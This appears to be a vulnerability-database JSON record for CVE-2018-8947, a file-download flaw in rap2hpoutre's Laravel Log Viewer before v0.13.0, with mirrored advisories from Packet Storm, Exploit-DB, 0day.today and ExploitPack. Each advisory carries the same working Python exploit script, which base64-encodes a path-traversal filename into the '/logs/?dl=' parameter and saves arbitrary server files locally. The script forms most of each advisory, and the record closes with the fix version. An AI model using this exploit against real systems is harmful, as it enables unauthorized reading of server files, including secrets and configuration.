{"id": "PACKETSTORM:146906", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Laravel Log Viewer Local File Download", "description": "", "published": "2018-03-26T00:00:00", "modified": "2018-03-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/146906/Laravel-Log-Viewer-Local-File-Download.html", "reporter": "Haboob Team", "references": [], "cvelist": ["CVE-2018-8947"], "lastseen": "2018-03-28T09:20:46", "viewCount": 19, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2018-03-28T09:20:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8947"]}, {"type": "exploitdb", "idList": ["EDB-ID:44343"]}, {"type": "zdt", "idList": ["1337DAY-ID-30051"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:462103FD4430BC6DF5564DD01DE0ACFE"]}], "modified": "2018-03-28T09:20:46", "rev": 2}, "vulnersScore": 5.6}, "sourceHref": "https://packetstormsecurity.com/files/download/146906/laravellogviewer-download.txt", "sourceData": "`# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD) \n# Date: 23/02/2018 \n# Exploit Author: Haboob Team \n# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1 \n# Version: v0.12.0 and below \n# CVE : CVE-2018-8947 \n \n \n1. Description \n \nUnauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file. \n \n \n2. Proof of Concept \n \n#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including \"../\" the script will create a folder and save the downloaded file there \n \nimport os \nimport base64 \nfrom urllib2 import urlopen, URLError, HTTPError \nimport argparse \nimport cookielib \nparser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_') \nparser.add_argument(\"-u\", action=\"store\", dest=\"url\", help=\"Target URL\", required=True) \nparser.add_argument(\"-f\", action=\"store\", dest=\"file\", help=\"Target File\", required=True) \n \nargs = parser.parse_args() \nurl = str(args.url).strip()+\"/logs/?dl=\" \nfinal_file= args.file \nif not os.path.exists(\"./0Grats0\"): \nos.makedirs(\"./0Grats0\") \n \nword = str(args.file).split('/') \nword1= \"./0Grats0/\"+word[-1] \nfinalee=url+base64.b64encode(final_file) \n \ntry: \nf = urlopen(finalee) \nwith open(word1, \"wb\") as local_file: \nlocal_file.write(f.read()) \nexcept HTTPError, e: \nprint \"HTTP Error:\", e.code, finalee \nexcept URLError, e: \nprint \"URL Error:\", e.reason, finalee \n \n \n \n \n \n3. Solution: \n \nUpdate to version v0.13.0 \nhttps://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0 \n \n \n`\n"}

{"cve": [{"lastseen": "2021-02-02T06:52:43", "description": "rap2hpoutre Laravel Log Viewer before v0.13.0 relies on Base64 encoding for l, dl, and del requests, which makes it easier for remote attackers to bypass intended access restrictions, as demonstrated by reading arbitrary files via a dl request.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-03-25T16:29:00", "title": "CVE-2018-8947", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8947"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-8947", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8947", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "exploitdb": [{"lastseen": "2018-05-24T14:09:47", "description": "Laravel Log Viewer < 0.13.0 - Local File Download. CVE-2018-8947. Webapps exploit for PHP platform", "published": "2018-03-26T00:00:00", "type": "exploitdb", "title": "Laravel Log Viewer < 0.13.0 - Local File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8947"], "modified": "2018-03-26T00:00:00", "id": "EDB-ID:44343", "href": "https://www.exploit-db.com/exploits/44343/", "sourceData": "# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)\r\n# Date: 23/02/2018\r\n# Exploit Author: Haboob Team\r\n# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1\r\n# Version: v0.12.0 and below\r\n# CVE : CVE-2018-8947\r\n\r\n \r\n1. Description\r\n \r\nUnauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.\r\n \r\n \r\n2. Proof of Concept\r\n \r\n#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including \"../\" the script will create a folder and save the downloaded file there\r\n \r\nimport os\r\nimport base64\r\nfrom urllib2 import urlopen, URLError, HTTPError\r\nimport argparse\r\nimport cookielib\r\nparser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')\r\nparser.add_argument(\"-u\", action=\"store\", dest=\"url\", help=\"Target URL\", required=True)\r\nparser.add_argument(\"-f\", action=\"store\", dest=\"file\", help=\"Target File\", required=True)\r\n\r\nargs = parser.parse_args()\r\nurl = str(args.url).strip()+\"/logs/?dl=\"\r\nfinal_file= args.file\r\nif not os.path.exists(\"./0Grats0\"):\r\n os.makedirs(\"./0Grats0\")\r\n\r\nword = str(args.file).split('/')\r\nword1= \"./0Grats0/\"+word[-1]\r\nfinalee=url+base64.b64encode(final_file)\r\n\r\ntry:\r\n f = urlopen(finalee)\r\n with open(word1, \"wb\") as local_file:\r\n local_file.write(f.read())\r\nexcept HTTPError, e:\r\n print \"HTTP Error:\", e.code, finalee\r\nexcept URLError, e:\r\n print \"URL Error:\", e.reason, finalee\r\n \r\n \r\n \r\n \r\n \r\n3. Solution:\r\n \r\nUpdate to version v0.13.0\r\nhttps://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44343/"}], "zdt": [{"lastseen": "2018-04-06T03:38:23", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-03-23T00:00:00", "type": "zdt", "title": "Laravel Log Viewer < 0.13.0 - Local File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8947"], "modified": "2018-03-23T00:00:00", "href": "https://0day.today/exploit/description/30051", "id": "1337DAY-ID-30051", "sourceData": "# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)\r\n# Date: 23/02/2018\r\n# Exploit Author: Haboob Team\r\n# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1\r\n# Version: v0.12.0 and below\r\n# CVE : CVE-2018-8947\r\n \r\n \r\n1. Description\r\n \r\nUnauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.\r\n \r\n \r\n2. Proof of Concept\r\n \r\n#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including \"../\" the script will create a folder and save the downloaded file there\r\n \r\nimport os\r\nimport base64\r\nfrom urllib2 import urlopen, URLError, HTTPError\r\nimport argparse\r\nimport cookielib\r\nparser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')\r\nparser.add_argument(\"-u\", action=\"store\", dest=\"url\", help=\"Target URL\", required=True)\r\nparser.add_argument(\"-f\", action=\"store\", dest=\"file\", help=\"Target File\", required=True)\r\n \r\nargs = parser.parse_args()\r\nurl = str(args.url).strip()+\"/logs/?dl=\"\r\nfinal_file= args.file\r\nif not os.path.exists(\"./0Grats0\"):\r\n os.makedirs(\"./0Grats0\")\r\n \r\nword = str(args.file).split('/')\r\nword1= \"./0Grats0/\"+word[-1]\r\nfinalee=url+base64.b64encode(final_file)\r\n \r\ntry:\r\n f = urlopen(finalee)\r\n with open(word1, \"wb\") as local_file:\r\n local_file.write(f.read())\r\nexcept HTTPError, e:\r\n print \"HTTP Error:\", e.code, finalee\r\nexcept URLError, e:\r\n print \"URL Error:\", e.reason, finalee\r\n\r\n\r\n3. Solution:\r\n \r\nUpdate to version v0.13.0\r\nhttps://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0\n\n# 0day.today [2018-04-06] #", "sourceHref": "https://0day.today/exploit/30051", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:25", "description": "\nLaravel Log Viewer 0.13.0 - Local File Download", "edition": 1, "published": "2018-03-26T00:00:00", "title": "Laravel Log Viewer 0.13.0 - Local File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8947"], "modified": "2018-03-26T00:00:00", "id": "EXPLOITPACK:462103FD4430BC6DF5564DD01DE0ACFE", "href": "", "sourceData": "# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)\n# Date: 23/02/2018\n# Exploit Author: Haboob Team\n# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1\n# Version: v0.12.0 and below\n# CVE : CVE-2018-8947\n\n \n1. Description\n \nUnauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.\n \n \n2. Proof of Concept\n \n#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including \"../\" the script will create a folder and save the downloaded file there\n \nimport os\nimport base64\nfrom urllib2 import urlopen, URLError, HTTPError\nimport argparse\nimport cookielib\nparser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')\nparser.add_argument(\"-u\", action=\"store\", dest=\"url\", help=\"Target URL\", required=True)\nparser.add_argument(\"-f\", action=\"store\", dest=\"file\", help=\"Target File\", required=True)\n\nargs = parser.parse_args()\nurl = str(args.url).strip()+\"/logs/?dl=\"\nfinal_file= args.file\nif not os.path.exists(\"./0Grats0\"):\n os.makedirs(\"./0Grats0\")\n\nword = str(args.file).split('/')\nword1= \"./0Grats0/\"+word[-1]\nfinalee=url+base64.b64encode(final_file)\n\ntry:\n f = urlopen(finalee)\n with open(word1, \"wb\") as local_file:\n local_file.write(f.read())\nexcept HTTPError, e:\n print \"HTTP Error:\", e.code, finalee\nexcept URLError, e:\n print \"URL Error:\", e.reason, finalee\n \n \n \n \n \n3. Solution:\n \nUpdate to version v0.13.0\nhttps://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}